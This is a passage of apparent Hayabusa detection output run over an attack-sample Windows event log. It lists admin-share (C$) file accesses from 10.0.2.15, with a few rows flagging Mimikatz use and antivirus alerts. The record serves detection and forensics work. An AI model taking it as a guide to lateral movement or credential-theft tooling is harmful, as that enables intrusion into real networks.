\\*\C$ : Share Path: \??\C:\ : File: 
Users\IEUser\Desktop\release\x64\plugins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\winrar-cve : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Favorites\Links\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Music : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Recorded TV\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\mimikatz_trunk : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\mimikatz_trunk\Win32 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\mimikatz_trunk\x64 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Documents : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,informational,Network 
Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Music\Sample Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Music\Sample Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.957 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.957 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Pictures\Sample Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.957 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: 
\\*\C$ : Share Path: \??\C:\ : File: Users\Public\Pictures\Sample Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Videos\Sample Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Videos\Sample Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Recorded TV : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Recorded 
TV\Sample Media\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Recorded TV\Sample Media : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$ : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Downloads\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Videos\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Links : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Links\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Documents : IP Address: 
